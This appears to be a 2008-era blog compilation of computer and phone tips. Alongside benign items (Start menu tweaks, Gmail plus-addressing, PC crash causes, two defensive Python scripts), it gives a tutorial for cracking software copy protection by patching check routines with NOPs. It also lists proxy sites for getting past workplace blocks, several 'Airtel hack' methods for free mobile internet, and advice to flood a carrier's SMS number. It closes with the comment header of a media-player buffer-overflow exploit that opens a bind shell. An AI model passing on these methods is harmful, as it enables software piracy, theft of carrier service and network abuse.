If you put too many icons on your Windows XP Start menu pinned list, Windows may start to worry about the start menu real estate and bug you with messages. By decreasing the number of items on the "most frequently used" list, you make more room available for the pinned list.

1. Right-click the Start button
2. Select Properties
3. Click the tab "Start Menu"
4. Click the button "Customize"
5. In the "Programs" section, decrease the "Number of programs on Start menu"
6. You might also want to select the radio button "Small icons" in this dialog to have more space on the Start menu
7. Click OK
8. Click OK once more

Open orkut in blocked PC's

hi friends u can open any types of websites from following links if it banned..
enjoy

*www.mathtunnel.com
*www.gravitywars.com
*www.kproxy.com
*www.calculatepie.com
*http://www.anonymizer.com/

Open the above sites and just type in http://www.orkut.com in companies or colleges where its blocked n enjoy

Use Gmail to generate unlimited e-mail addresses

Gmail has an interesting quirk where you can add a plus sign (+) and a phrase after the username part of your Gmail address, and mail sent to it will still get to your inbox. It's called plus-addressing, and it essentially gives you an unlimited number of e-mail addresses to play with. Here's how it works: say your address is pinkyrocks@gmail.com, and you want to automatically label all work e-mails. Add a plus sign and a phrase to make it pinkyrocks+work@gmail.com and set up a filter to label it work (to access your filters go to Settings->Filters and create a filter for messages addressed to pinkyrocks+work@gmail.com. Then add the label work).

More real world examples:

Find out who is spamming you: Be sure to use plus-addressing for every form you fill out online and give each site a different plus address.

Example: You could use
pinkyrocks+nytimes@gmail.com for nytimes.com
pinkyrocks+freestuff@gmail.com for freestuff.com
Then you can tell which site has given your e-mail address to spammers, and automatically send them to the trash.

Automatically label your incoming mail: I've talked about that above.

Archive your mail: If you receive periodic updates about your bank account balance or are subscribed to a lot of mailing lists that you don't check often, then you can send that sort of mail to the archives and bypass your Inbox.

Example: For the mailing list, you could give pinkyrocks+mailinglist1@gmail.com as your address, and assign a filter that will archive mail to that address automatically. Then you can just check in once in a while on the archive if you want to catch up.

Update (9/7): Several commenters have indicated that this is not a Gmail-specific trick. kl says Fastmail has enabled this feature as well. caliban10 reports that a lot of sites reject addresses with a plus sign. You might use other services like Mailinator for disposable addresses instead. pbinder recommends using services like SpamGourmet, which redirects mail to your real address.
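The "find out who is spamming you" idea above can be automated. The following is an added example, not part of the original post: it reads message headers, extracts the plus tag the mail was addressed to, and reports tags that are being used by senders other than the site the tag was given to. The function names, the sample messages and the rule that a tag is named after a label in the site's domain (as in the nytimes and freestuff examples) are assumptions.

```python
from collections import defaultdict
from email import message_from_string
from email.utils import getaddresses, parseaddr

OWNER = "pinkyrocks@gmail.com"        # base address used in the post
SITE_TAGS = {"nytimes", "freestuff"}  # tags handed to sites; "work" is only a label
RECIPIENT_HEADERS = ("Delivered-To", "X-Original-To", "To", "Cc")

# Constructed sample messages; only the headers matter here.
SAMPLE_MESSAGES = [
    "From: NYTimes <news@email.nytimes.com>\nTo: pinkyrocks+nytimes@gmail.com\n"
    "Subject: Morning briefing\n\nbody\n",
    "From: deals@cheap-pills.example\nTo: <pinkyrocks+freestuff@gmail.com>\n"
    "Subject: Best prices\n\nbody\n",
    "From: promo@freestuff.com\nTo: pinkyrocks+freestuff@gmail.com\n"
    "Subject: Your free stuff\n\nbody\n",
    # Bcc'd mail: the tagged address only shows up in Delivered-To.
    "From: Winner Desk <x@lottery.example>\nTo: undisclosed-recipients:;\n"
    "Delivered-To: pinkyrocks+freestuff@gmail.com\nSubject: You won\n\nbody\n",
    "From: boss@corp.example\nTo: pinkyrocks+work@gmail.com\n"
    "Subject: Status report\n\nbody\n",
    "From: friend@example.org\nTo: pinkyrocks@gmail.com\nSubject: Hi\n\nbody\n",
]


def split_plus(address):
    """'User+tag@Host' -> ('user@host', 'tag'); tag is '' when absent."""
    local, _, domain = address.strip().lower().rpartition("@")
    base, _, tag = local.partition("+")
    return f"{base}@{domain}", tag


def tags_used(raw_message, owner):
    """Plus tags of `owner` found in any recipient header of one message."""
    msg = message_from_string(raw_message)
    tags = set()
    for header in RECIPIENT_HEADERS:
        for value in msg.get_all(header, []):
            # Parse each header on its own so one malformed value
            # cannot hide the addresses in another header.
            for _name, addr in getaddresses([value]):
                if "@" not in addr:
                    continue
                base, tag = split_plus(addr)
                if base == owner and tag:
                    tags.add(tag)
    return tags


def sender_domain(raw_message):
    """Lower-cased domain of the From address ('' if missing)."""
    _name, addr = parseaddr(message_from_string(raw_message).get("From", ""))
    return addr.rpartition("@")[2].lower()


def find_leaks(raw_messages, owner, site_tags):
    """Map each site tag to sender domains that used it but are not that site.

    Assumption: a tag equals one label of the site's domain, so mail to
    +nytimes is expected from nytimes.com or a subdomain of it.
    """
    owner = owner.lower()
    leaks = defaultdict(set)
    for raw in raw_messages:
        domain = sender_domain(raw)
        for tag in tags_used(raw, owner) & site_tags:
            if tag not in domain.split("."):
                leaks[tag].add(domain)
    return {tag: sorted(domains) for tag, domains in leaks.items()}


if __name__ == "__main__":
    for tag, domains in find_leaks(SAMPLE_MESSAGES, OWNER, SITE_TAGS).items():
        user, _, host = OWNER.partition("@")
        print(f"{user}+{tag}@{host} is used by: {', '.join(domains)}")
```

A From header can be forged, so a mismatch shows that the tagged address has circulated beyond the site it was given to, not who actually sent the mail.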

Prevent Pendrive virus

:: Do the following ::

1) Disable autorun/autoplay function of your pen drive.

2) Now plug in your pen drive and open any folder on your computer.
(Do not open any folder from your pen drive.)

3) Now go to Tools, then select Folder Options.
In that box, mark the Show Hidden Files & Folders option.
Also uncheck Hide Extensions for Known File Types and Hide Protected OS Files.

Now click the Apply and OK buttons and close that folder.

4) Now come to the desktop.
On the desktop, click on the Windows Start button and select Search for Files & Folders.

When the search dialog box appears on the screen, click on All Files & Folders, then click on More Advanced Options and select Search Hidden Files & Folders.

Now go above and, in the Look In option, select your pen drive letter (for example E: or G:)
and hit Enter.

5) Now if you see any unknown .exe files, simply delete them all.
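The search in steps 3 to 5 can be scripted as a read-only report. The following is an added example, not part of the original post: it lists executable files on a drive, marks those with the hidden or system attribute, and also reads autorun.inf to show which file Windows would be asked to launch. It goes slightly beyond step 5 by covering other directly runnable extensions and autorun.inf; the function names, the extension list and the sample layout are assumptions, and nothing is deleted.

```python
import os
import sys
import tempfile

# Windows file-attribute bits (Win32 values); only exposed by os.lstat on Windows.
FILE_ATTRIBUTE_HIDDEN = 0x2
FILE_ATTRIBUTE_SYSTEM = 0x4
# Assumed list of extensions that run when double-clicked.
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs"}


def parse_autorun(path):
    """Return (key, value) launch entries from the [autorun] section."""
    commands = []
    section = ""
    with open(path, "r", encoding="latin-1") as fh:
        for raw in fh:
            line = raw.replace("\x00", "").strip()  # tolerate NUL padding
            if not line or line.startswith(";"):
                continue
            if line.startswith("[") and line.endswith("]"):
                section = line[1:-1].strip().lower()
                continue
            if section != "autorun" or "=" not in line:
                continue  # junk lines and other sections are ignored
            key, value = (part.strip() for part in line.split("=", 1))
            key = key.lower()
            if key in ("open", "shellexecute") or (
                key.startswith("shell\\") and key.endswith("\\command")
            ):
                commands.append((key, value))
    return commands


def launch_target(command):
    """Normalised relative path of the program an autorun entry starts."""
    command = command.strip()
    if command.startswith('"'):
        token = command[1:].split('"', 1)[0]
    else:
        parts = command.split()
        token = parts[0] if parts else ""
    return token.replace("\\", "/").lstrip("/").lower()


def is_hidden(path):
    """True if the hidden or system attribute is set (always False off Windows)."""
    attrs = getattr(os.lstat(path), "st_file_attributes", 0)
    return bool(attrs & (FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))


def scan_drive(root):
    """Report autorun.inf launch entries and every executable under root."""
    report = {"autorun_commands": [], "executables": []}
    for name in os.listdir(root):
        full = os.path.join(root, name)
        if name.lower() == "autorun.inf" and os.path.isfile(full):
            report["autorun_commands"] = parse_autorun(full)
    targets = {launch_target(cmd) for _key, cmd in report["autorun_commands"]}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in EXECUTABLE_EXTS:
                continue
            full = os.path.join(folder, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            report["executables"].append({
                "path": rel,
                "hidden": is_hidden(full),
                "autorun_target": rel.lower() in targets,
            })
    report["executables"].sort(key=lambda entry: entry["path"].lower())
    return report


def build_sample(root):
    """Create a constructed sample drive layout made of harmless empty files."""
    os.makedirs(os.path.join(root, "RECYCLER"))
    for rel in ("RECYCLER/svc.exe", "setup.exe", "notes.txt"):
        open(os.path.join(root, *rel.split("/")), "w").close()
    with open(os.path.join(root, "autorun.inf"), "w", encoding="latin-1") as fh:
        fh.write(
            "; constructed sample\n[AutoRun]\n"
            "open=RECYCLER\\svc.exe -s\n"
            "shell\\open\\command=RECYCLER\\svc.exe\n"
            "icon=folder.ico\nline without an equals sign\n"
            "[other]\nopen=ignored.exe\n"
        )


if __name__ == "__main__":
    if len(sys.argv) > 1:
        result = scan_drive(sys.argv[1])  # e.g. E:\ for the pen drive
    else:
        with tempfile.TemporaryDirectory() as sample:
            build_sample(sample)
            result = scan_drive(sample)
    for key, value in result["autorun_commands"]:
        print(f"autorun.inf {key} -> {value}")
    for entry in result["executables"]:
        flags = [n for n in ("hidden", "autorun_target") if entry[n]]
        print(f"{entry['path']}  {','.join(flags) or '-'}")
```

Run it with the pen drive's root as the only argument; without an argument it scans the constructed sample.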

How to crack any type of software security

Software you need: W32Dasm and HIEW

Identifying the protection : ====>>>>

Run the program, game, etc., (SoftwareX) that you want to crack without the CD in the CD reader. SoftwareX will not run of course, however, when the error window pops up it will give you all of the vital information that you need to crack the program, so be sure to write down what it says.

Cracking the Protection : ====>>>>

Now, run Win32Dasm. On the file menu open DISASSEMBLER > OPEN FILE TO DISASSEMBLE. Select SoftwareX’s executable file in the popup window that will appear (e.g. SoftwareX.exe). W32Dasm may take several minutes to disassemble the file.

When W32Dasm finishes disassembling the file it will display unrecognizable text; this is what we want. Click on the String Data References button. Scroll through the String Data Items until you find SoftwareX’s error message. When you locate it, double click the error message and then close the window to return to the Win32Dasm text. You will notice that you have been moved somewhere within the SoftwareX’s check routine; this is where the error message is generated.

Now comes the difficult part, so be careful. To crack SoftwareX’s protection you must know the @offset of every call and jump command. Write down every call and jump @offset number that you see (You have to be sure, that the OPBAR change its used color to green). You need the number behind the @offset without the “h.”

Now open HIEW, locate SoftwareX’s executable, and press the F4 key. At this point a popup window will appear with 3 options: Text, Hex, and Decode. Click on “Decode” to see a list of numbers. Now press the F5 key and enter the number that was extracted using Win32Dasm. After you have entered the number you will be taken to SoftwareX’s check routine within HIEW.

To continue you must understand this paragraph. If the command that you are taken to is E92BF9BF74, for example, it means that the command equals 5 bytes. Every 2 digits equal one byte: E9-2B-F9-BF-74 => 10 digits => 5 bytes.

If you understood this then you can continue.

Press F3 (Edit), this will allow you to edit the 10 digits. Replace the 5 bytes with the digits 90. In other words, E92BF9BF74 will become 9090909090 (90-90-90-90-90). After you complete this step press the F10 key to exit.

=====>>>>>Congratulations! You just cracked SoftwareX!<<<<<=====

The 13 best torrent downloaders

Torrent Acquisition is a torrent client, which allows you to share files with tens of millions of Mac and Windows users around the planet. Requirements: Mac OS X 10.4 Tiger.

Opera is the fastest, and most secure free Web browser available. You don’t need a separate BitTorrent application to download large files. Simply click a torrent link and start the download.

Arctic Torrent is an Open Source minimal BitTorrent client. It won’t have all the pretty features that other Torrent apps have, but focuses on low memory and CPU usage. Because it was written in C++, you don't get the high memory requirements of Java or high CPU usage of Python. Arctic is tested on Windows XP and should work on 2000, XP, and 2003 in 32-bit and 64-bit. It uses Unicode and thus will not run on Windows 9x.

Azureus implements the BitTorrent protocol using java language and comes bundled with many invaluable features for both beginners and advanced users. Runs on all operating systems.

BitComet is a BitTorrent/HTTP/FTP download management software, which is powerful, fast, very easy-to-use, and completely free. It contains many advanced features for BitTorrent download and extends its leading BitTorrent technology to HTTP/FTP to accelerate downloading up to 5 - 10 times faster, or more. Runs on Windows 2000/XP/2003/Vista. Windows 98/Me can use the ZIP version.

Torrent Swapper is an open source sociable peer to peer file-sharing client based on the Bittorrent protocol that is ideal for high-speed distribution of large files that has a basic understanding of human friendships, of user tastes in content, and of Internet connectivity between users. Torrent Swapper supports simultaneous downloads, download queue, selected downloads in torrent package, fast-resume, disk cache, speed limits, port mapping, proxy, ip-filter, etc. Works with Linux, OS X and Windows.

BitLord is a powerful C++ BitTorrent Client. BitLord is a p2p file-sharing freeware program fully compatible with Bittorrent, which is the most popular p2p protocol designed for high-speed distribution of 100MB or GB sized files. It supports simultaneous downloads, download queue, selected downloads in torrent package, fast-resume, chatting, disk cache, speed limits, port mapping, proxy, ip-filter, etc. Works with Windows 98/ME/2000/XP/2003.

μTorrent is a BitTorrent client that includes bandwidth prioritization, scheduling, RSS auto-downloading and Mainline DHT (compatible with BitComet). Additionally, µTorrent supports the Protocol Encryption joint specification and peer exchange. Windows only.

BitSpirit is a powerful and easy-to-use BitTorrent client. It supports simultaneous downloads, download queue, UPnP port-mapping, NAT traversal (UDP transport), select downloads from multiple files torrent package, disk cache, chatting with other peers, torrent market, ip-filter, etc. Runs on Windows 98/Me/2000/XP/2003.

BitTornado is a BitTorrent client. Works on Windows, Linux, OS X, BSD.

BitTorrent for Windows brings together BitTorrent’s proven expertise in networking protocols with µTorrent’s efficient implementation and compelling UI to create a better BitTorrent client.

BitTyrant is a new, protocol compatible BitTorrent client that is optimized for fast download performance. Works with Linux, OS X, and Windows.

FlashGet is a leading download manager and has the highest amount of users on the Internet. It uses the MHT (Multi-server Hyper-threading Transportation) technique, supports various protocols and has excellent document management features. FlashGet is freeware without any adware or spyware.

Speed up your Acrobat Reader to load as fast as Notepad

Do you get irritated when Acrobat Reader takes 5/10 seconds to load when you want to open a PDF document? There is a way to speed up the loading.

1. Go to the installation folder of Acrobat Reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat: cut and paste the files, NOT copy & paste.)

Also make sure that Acrobat Reader is not open, or else it will lock the files and not allow you to move them.

Now your Acrobat Reader will load very fast
and almost as good as Notepad.

How to create con folder

easy way

Hold Alt and type 0160 (for an invisible character), then release Alt and type con. Now you have a folder named con.

Airtel hack for free internet all methods

~cheers~
You need a PC or a Laptop and the required connectivity tools ,ie.,
Serial/USB cable OR Infrared Device OR Bluetooth dongle

1) Activate Airtel Live! (It's FREE so no probs)

2) Create TWO Airtel gprs data accounts (yep TWO) and select the
FIRST as the active profile.

3) Connect your mobile to the PC (or Laptop) and install the driver for
your mobile's modem.

4) Create a new dial-up connection using the NEW CONNECTION
WIZARD as follows

Connecting Device : Your mobile's modem
ISP Name : Airtel (or anything you like)
Phone Number : *99***2# / Try 99***1
Username and Password : blank

5) Configure your browser and download manager to use the proxy
100.1.200.99 and port 8080.( My advice is to use Opera since you
can browse both wap and regular websites)

6) Connect to the dial-up account. You will be connected at 115.2
kbps (but remember, that is a bad joke).

7) Pick up your mobile and try to access any site. You will get "Access
Denied" (except for Airtel Live!). IT DOES NOT MATTER.
Keep the mobile down.

8) On the PC (or Laptop) open your browser, enter any address,
press ENTER and... WAIT

9) After a few seconds the page will start to load and you have the
WHOLE internet at your disposal.

TWO

Under DATA COMM
~~~~~~~~~~~~

APN : airtelfun.com

USERNAME : blank

PASSWORD : blank

PASS REQ : OFF

ALLOW CALLS : AUTOMATIC

IPADDRESS :

DNSADDRESS :

DATA COMP : OFF

HEADER COMP : OFF

Under INTERNET PROFILES
~~~~~~~~~~~~~~~~

INTERNET MODE : HTTP or WAP (both worked for me)

USE PROXY : YES

IP ADDRESS : 100.1.200.99

PORT : 8080

USERNAME :

PASSWORD :

No Risk Here, Try it and Enjoy

Three

1st go to settings menu then to connectivity tab now choose the option Data comm. then “DATA ACCOUNTS” go to new account now the settings r as follows
ACCOUNT TYPE:GPRS
NEW ACCOUNT NAME:A1
APN:airtelfun.com
usr name: (blank)
password: (blank)

now save it
NOW!
go to Internet Setting in connectivity here choose intrnet profile–go to new profile setting are as below
NAME:A1
CONNECT USING:A1(which was created in data comm.)
save it
now u would be able to see it now selest it and take “more” option then select setting here in use proxy option it will be selected no if it is no then change it into yes
now go to proxy adress and give the adress as
100.1.200.99 and then the port number as 8080
Usr name:
password:
now save all the settings u made . come back 2 connectivity
choose streaming settings now in connect using option choose a1 that we created leave the use proxy option as no itself
THESE R THE SETTINGS
now access airtellive! from ur activated SE phone goto VIDEO GALLERY OR VIDEO UNLIMITED(varies according to states) choose live streaming then choose CNBC OR AAJTAK WHILE CONNECTING TO MEDIA SERVER cancel AFTER 9 or 10 sec then type any web adress if it shows access denied then once again select CNBC and wait for a few more sec than before if its fully connected also no prob its free then cancel it or if ur connected then stop it and the internet is ready to take of .GOOD LUCK SE AIRTEL USERS

alternate

For All Airtel Users

Requirements:
1. Airtel live (available 4 free)
2. Nokia series60 handset eg 6600,6630,n series,7610,6670 etc
3. Opera wap browser 4 mobile
Procedure:-

1. Go to ur connection settings and make a new internet profile using the default settings of airtel live. name that new profile as nething(for eg masala); change the home page of that profile to nething u like for eg www.google.com.

2. Go to ur Opera browser and set the default connection as AIRTEL LIVE. this is the original settings u received thru airtel.

3. Go to the services(in n6600) and Web(N6630) and change the default profile for connection as masala (newer one).

**Note: always make sure that ur access point is airtelfun.com

Apply:-

1. Open Opera and u will see that homepage of Airtel Live is opened. Minimize the application.

2. Now open web using the duplicate Profile and u will see that two gprs connections will work simultaneously and at the web or the services page it will show “Unable to connect” or any error. well thats the signal of ur success.

3. Simply go on the Opera with web on and open any site u want for free. No Charges No nothing.

U can also use it through ur computer……….

someone said dis too

The main principle behind this is we hav 2 fool the bsnl techies 2 activate portal and thus get gprs activated / get “G” signal on ur cell as bsnl portal (wap.cellone.in) needs “gprs signal on ur cel (whether gprs is formaly activated/registerd or not (by my method )i dont know)

NORMALLY THEY DONT DO THAT INSPITE OF THE FACT THAT THEY SHOULD ACTIVATE GPRS SIGNAL SERVICE FOR PORTAL!!!
AND THEY WILL GIVE U NO OF REASONS—-
—THAT portal is message based , so go to cellone icon in menu and use that sms based portal (what the f**k)
—THAT portal service will be activated when u will activate gprs by filling up form and registering at nearest CCN!!
—THAT ur handset has some problems (if u say that “G” signal is not present)
—-etc,etc!!

U HAVE 2 ACTIVATE PORTAL FIRST WHICH IS FREE AND U CAN EAT UP CC’S FOR THIS REASON!!
SO WHAT U HAV 2 DO IS–
1) SEND PORTAL to 3733 AND CONFIRMATION SHD COME WITH 5 MIN AT-MAXIMM !!
2) SEND FOR ATLEAST 20-30 TIMES (CAN B ANY MORE THAN THAT)
JUST S**K UP THE NETWORK(3733) WITH THESE MESSAGES !!!
THAT’S FREE NO!! BOTH ON POST AND PRE!!
3) NOW ALONG ALSO SEND 20-40 SMS AS GPRS TO 3733
(NO OF SMS DIRECTLY PROPORTIONAL 2 HATE FOR BSNL AND HOW EARLY U WNAN GET UR GPRS ACTIVATED) this is also free both on post and pre!!
4) U WILL GET CONFIRMATION IN BOTH CASES AND MSG TELLS U 2 GET SETTINGS FROM 9400024365, THE NO OF CC!!
HERE AT MY PLACE I CAN DIAL 9419024365 ALSO!
BOTH R TOLL FREE AND BOTH R LOCATED IN CHANDIGARH!!!
(((((((AND SOME OF THE CC’S SAY they cant give such sensitive information that where they r located, as if thay have a 3 rd world of their own! and the other dumbs said that they r in chandigarh!!!!)))))

I WOULD ADVISE ALL FIRST, 2 call them once 2 get the settings!!
(most of the times that is incorect but gives u an idea of settings in ur area))
Try and in ur 1 st call only,
talk roughly and tell them u r calling 10-20th time just for settings and is that their service!!!
5) Now when u get them save them AND plz post them here!!!
6) now GET ATLEAST 2-3 COMPLAINTS REGISTERED( each after 1 day) THAT UR PORTAL HAS NOT ACTIVATED AND GET THEIR SERIAL NO.
and in the end bombard them abt the status of all those complaints !!
b4 registering ur complaint they will hesitate much and always say taht they will b sendin new settings which r accurate! but dont belive them and just register complaints!!
6)AFTER THAT, u have 2 only wait until “G” signal is there on ur screen!!

LOOK, WHAT I HAVE WRIITEN ABV IS METHOD by which i got activated my “G” service !!! without fillin any form or such and without any money drain!!
may be since it bypasses the formal way of registeration, that is why this trick is working !!!!!!!!!!!!

U may also Try this

first open ur msg window and type LIVE and send it to 2567 so that after 5 min u get the setting of Airtel Live or if u have already no need for this procedure.
now then open that setting and copy all the settings from it and create one access point manually which has all the settings like Airtel Live has.
now only one change will be there and it would be in access point name which is “Airtelmms.com” instead of originally “Airtelgprs.com”.
ok u’ve done it just active that setting and access free airtel gprs on ur phone.

Another Trick
somya_cse
You need a PC or a Laptop and the required connectivity tools ,ie.,
Serial/USB cable OR Infrared Device OR Bluetooth dongle

1) Activate Airtel Live! (It's FREE so no probs)

2) Create TWO Airtel gprs data accounts (yep TWO) and select the
FIRST as the active profile.

3) Connect your mobile to the PC (or Laptop) and install the driver for
your mobile's modem.

4) Create a new dial-up connection using the NEW CONNECTION
WIZARD as follows

Connecting Device : Your mobile's modem
ISP Name : Airtel (or anything you like)
Phone Number : *99***2#
Username and Password : blank

5) Configure your browser and download manager to use the proxy
100.1.200.99 and port 8080.( My advice is to use Opera since you
can browse both wap and regular websites)

6) Connect to the dial-up account. You will be connected at 115.2
kbps (but remember, that is a bad joke).

7) Pick up your mobile and try to access any site. You will get "Access
Denied" (except for Airtel Live!). IT DOES NOT MATTER.
Keep the mobile down.

8) On the PC (or Laptop) open your browser, enter any address,
press ENTER and... WAIT

9) After a few seconds the page will start to load

main thing is the advance initialization command.

10 reasons why PCs crash that you must know

"Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."

You have just been struck by the Blue Screen of Death. Anyone who uses Microsoft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?

1 Hardware conflict

The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.

For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.

If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:

* Start-Settings-Control Panel-System-Device Manager.

Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.

Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.

Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is www.driverguide.com. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).

When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.

To be fair to Microsoft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.

2 Bad Ram

Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.

But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.

One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.

Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.

EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.

3 BIOS settings

Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.

Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.

A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.

Microsoft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this).

4 Hard disk drives

After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to

* Start-Programs-Accessories-System Tools-Disk Defragmenter

This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.

The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).

Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to

* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.

Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.

Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to

* Start-Programs-Accessories-System Tools-ScanDisk

Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.

5 Fatal 0E exceptions and VXD errors

Fatal 0E exception errors and VXD errors are often caused by video card problems.

These can often be resolved easily by reducing the resolution of the video display. Go to

* Start-Settings-Control Panel-Display-Settings

Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.

If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to

* Start-Settings-Control Panel-System-Device Manager

Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.

If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.

The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.

Another useful way to resolve video problems is to go to

* Start-Settings-Control Panel-System-Performance-Graphics

Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).

Look up your video card's manufacturer on the internet and search for the most recent drivers for it.

6 Viruses

Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to

* Start-Settings-Control Panel-Add/Remove Programs

Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.

A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.

An excellent antivirus programme is McAfee VirusScan by Network Associates (www.nai.com). Another is Norton AntiVirus 2000, made by Symantec (www.symantec.com).

7 Printers

The action of sending a document to print creates a bigger file, often called a postscript file.

Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.

If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.

8 Software

A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.

The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner by Jouni Vuorio to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000.

Read the instructions and use it carefully so you don't do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system. Reg Cleaner can be obtained from www.jv16.org

Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.

Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.

Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.

Remember to restore all the BIOS settings back to their former settings following installation.

9 Overheating

Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.

One remedy is to get a bigger, better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from www.computernerd.com or www.coolit.com

CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.

10 Power supply problems

With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.

If this has become a nuisance for you then consider buying an uninterruptible power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.

It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.

Wednesday, July 30, 2008

Kantaris 0.3.4 SSA Subtitle Local Buffer Overflow Exploit


#!/usr/bin/python
#
# Kantaris 0.3.4 Media Player Local Buffer Overflow [0day!]
#
# The following exploit will make a film.ssa file,
# just rename the file with the name of your movie, and use your imagination

# to pwn! :)
# Shellcode is local bind shell, just telnet to port:4444 to get command prompt :)
#
# BIG thanks to muts for helping
